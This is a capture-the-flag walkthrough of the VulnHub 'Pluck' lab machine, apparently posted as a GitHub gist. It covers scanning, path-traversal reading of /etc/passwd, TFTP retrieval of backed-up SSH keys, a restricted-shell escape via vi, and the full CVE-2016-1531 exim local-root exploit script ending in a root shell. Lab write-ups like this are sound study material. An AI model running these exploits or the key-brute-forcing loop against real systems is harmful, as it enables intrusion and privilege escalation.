Created
December 18, 2017 13:47
-
-
Save setrus/43d36733538a7ce372f7b51fe0260d2d to your computer and use it in GitHub Desktop.
plunk @ VulnHub
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Discovering Network | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| root@setrus:~# netdiscover -r 192.168.56.0/24 | |
| Currently scanning: Finished! | Screen View: Unique Hosts | |
| 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 | |
| _____________________________________________________________________________ | |
| IP At MAC Address Count Len MAC Vendor / Hostname | |
| ----------------------------------------------------------------------------- | |
| 192.168.56.100 08:00:27:2e:01:02 1 60 PCS Systemtechnik GmbH | |
| 192.168.56.101 08:00:27:45:29:54 1 60 PCS Systemtechnik GmbH | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Scanning the target - TCP scan | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| root@setrus:~# nmap -sVT -O -A 192.168.56.101 | |
| Nmap scan report for 192.168.56.101 | |
| Host is up (0.00038s latency). | |
| Not shown: 997 closed ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0) | |
| | ssh-hostkey: | |
| | 2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA) | |
| | 256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA) | |
| |_ 256 18:98:5a:5a:5c:59:e1:25:70:1c:37:1a:f2:c7:26:fe (EdDSA) | |
| 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | |
| |_http-server-header: Apache/2.4.18 (Ubuntu) | |
| |_http-title: Pluck | |
| 3306/tcp open mysql MySQL (unauthorized) | |
| MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC) | |
| Device type: general purpose | |
| Running: Linux 3.X|4.X | |
| OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 | |
| OS details: Linux 3.2 - 4.8 | |
| Network Distance: 1 hop | |
| Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
| TRACEROUTE | |
| HOP RTT ADDRESS | |
| 1 0.38 ms 192.168.56.101 | |
| OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Scanning th Target UDP scan | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| root@setrus:~# nmap -sU 192.168.56.101 | |
| Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-18 08:11 EST | |
| Nmap scan report for 192.168.56.101 | |
| Host is up (0.00055s latency). | |
| Not shown: 997 closed ports | |
| PORT STATE SERVICE | |
| 68/udp open|filtered dhcpc | |
| 69/udp open|filtered tftp | |
| 5355/udp open|filtered llmnr | |
| MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC) | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Running nikto on the web server [80] | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| root@setrus:~# nikto -h http://192.168.56.101/ | |
| - Nikto v2.1.6 | |
| --------------------------------------------------------------------------- | |
| + Target IP: 192.168.56.101 | |
| + Target Hostname: 192.168.56.101 | |
| + Target Port: 80 | |
| + Start Time: 2017-12-18 06:20:55 (GMT-5) | |
| --------------------------------------------------------------------------- | |
| + Server: Apache/2.4.18 (Ubuntu) | |
| + The anti-clickjacking X-Frame-Options header is not present. | |
| + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS | |
| + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type | |
| + No CGI Directories found (use '-C all' to force check all possible dirs) | |
| + Web Server returns a valid response with junk HTTP methods, this may cause false positives. | |
| + /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php) | |
| + OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected. | |
| + OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected. | |
| + OSVDB-3092: /admin.php: This might be interesting... | |
| + OSVDB-3268: /images/: Directory indexing found. | |
| + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found. | |
| + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 | |
| + OSVDB-3233: /icons/README: Apache default file found. | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Nikto shows that | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| + /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Testing the nikto finding | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| root@setrus:~# curl http://192.168.56.101/index.php?page=../../../../../../../../../../etc/passwd | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| The response from the server reveals that Local File Inclusion is possible | |
| Content of /etc/passwd | |
| root:x:0:0:root:/root:/bin/bash | |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
| bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
| sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
| sync:x:4:65534:sync:/bin:/bin/sync | |
| games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
| man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
| lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
| mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
| news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
| uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
| proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
| www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
| backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
| list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
| irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin | |
| gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | |
| nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
| systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false | |
| systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false | |
| systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false | |
| systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false | |
| syslog:x:104:108::/home/syslog:/bin/false | |
| _apt:x:105:65534::/nonexistent:/bin/false | |
| messagebus:x:106:109::/var/run/dbus:/bin/false | |
| mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false | |
| lxd:x:108:65534::/var/lib/lxd/:/bin/false | |
| uuidd:x:109:114::/run/uuidd:/bin/false | |
| dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false | |
| sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin | |
| pollinate:x:112:1::/var/cache/pollinate:/bin/false | |
| bob:x:1000:1000:bob,,,:/home/bob:/bin/bash | |
| Debian-exim:x:113:119::/var/spool/exim4:/bin/false | |
| peter:x:1001:1001:,,,:/home/peter:/bin/bash | |
| paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu | |
| backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh | |
| Getting Backup.sh | |
| Testing for Open port 69 (TFTP) | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| root@setrus:~# nmap -p69 -sU 192.168.56.101 | |
| PORT STATE SERVICE | |
| 69/udp open|filtered tftp | |
| MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC) | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Getting the backup.tar | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| root@setrus:~/VulnHub/plunk# tftp 192.168.56.101 | |
| tftp> get /backups/backup.tar | |
| Received 1824718 bytes in 0.9 seconds | |
| root@setrus:~/VulnHub/plunk# ls backup/home/paul/keys/ | |
| id_key1 id_key2 id_key3 id_key4 id_key5 id_key6 | |
| id_key1.pub id_key2.pub id_key3.pub id_key4.pub id_key5.pub id_key6.pub | |
| root@setrus:~/VulnHub/plunk# cat login.sh | |
| #!/bin/bash | |
| FILES=/root/VulnHub/plunk/backup/home/paul/keys/* | |
| for f in $FILES | |
| do | |
| echo "Attempting the following key: $f" | |
| ssh -i $f [email protected] -o PasswordAuthentication=no | |
| done | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| After loggin in we get a PDmenu | |
| To escape the menu end get a shell, start a vi and type | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| :set shell=/bin/bash | |
| :!bash | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Getting Paul Shell | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| paul@pluck:~$ id | |
| uid=1002(paul) gid=1002(paul) groups=1002(paul) | |
| paul@pluck:~$ uname -a | |
| Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux | |
| paul@pluck:~$ find / -perm -4000 2>/dev/null | |
| /usr/exim/bin/exim-4.84-7 | |
| /usr/bin/passwd | |
| /usr/bin/at | |
| /usr/bin/newgrp | |
| /usr/bin/pkexec | |
| /usr/bin/sudo | |
| /usr/bin/traceroute6.iputils | |
| /usr/bin/newuidmap | |
| /usr/bin/chfn | |
| /usr/bin/gpasswd | |
| /usr/bin/newgidmap | |
| /usr/bin/chsh | |
| /usr/lib/dbus-1.0/dbus-daemon-launch-helper | |
| /usr/lib/policykit-1/polkit-agent-helper-1 | |
| /usr/lib/s-nail/s-nail-privsep | |
| /usr/lib/openssh/ssh-keysign | |
| /usr/lib/eject/dmcrypt-get-device | |
| /bin/su | |
| /bin/umount | |
| /bin/mount | |
| /bin/fusermount | |
| /bin/ping | |
| /bin/ntfs-3g | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Searching for exploit on exim-4.84-7 | |
| https://www.exploit-db.com/exploits/39535/ | |
| This one is for 4.84-3 | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| #!/bin/sh | |
| # CVE-2016-1531 exim <= 4.84-3 local root exploit | |
| # =============================================== | |
| # you can write files as root or force a perl module to | |
| # load by manipulating the perl environment and running | |
| # exim with the "perl_startup" arguement -ps. | |
| # | |
| # e.g. | |
| # [fantastic@localhost tmp]$ ./cve-2016-1531.sh | |
| # [ CVE-2016-1531 local root exploit | |
| # sh-4.3# id | |
| # uid=0(root) gid=1000(fantastic) groups=1000(fantastic) | |
| # | |
| # -- Hacker Fantastic | |
| echo [ CVE-2016-1531 local root exploit | |
| cat > /tmp/root.pm << EOF | |
| package root; | |
| use strict; | |
| use warnings; | |
| system("/bin/sh"); | |
| EOF | |
| PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Writing code give_me_root.sh with the exploit above | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| paul@pluck:~$ vi give_me_root.sh | |
| paul@pluck:~$ chmod u+x give_me_root.sh | |
| paul@pluck:~$ ./give_me_root.sh | |
| ./give_me_root.sh: line 1: =: No such file or directory | |
| [ CVE-2016-1531 local root exploit | |
| # id | |
| uid=0(root) gid=1002(paul) groups=1002(paul) | |
| # whoami | |
| root | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment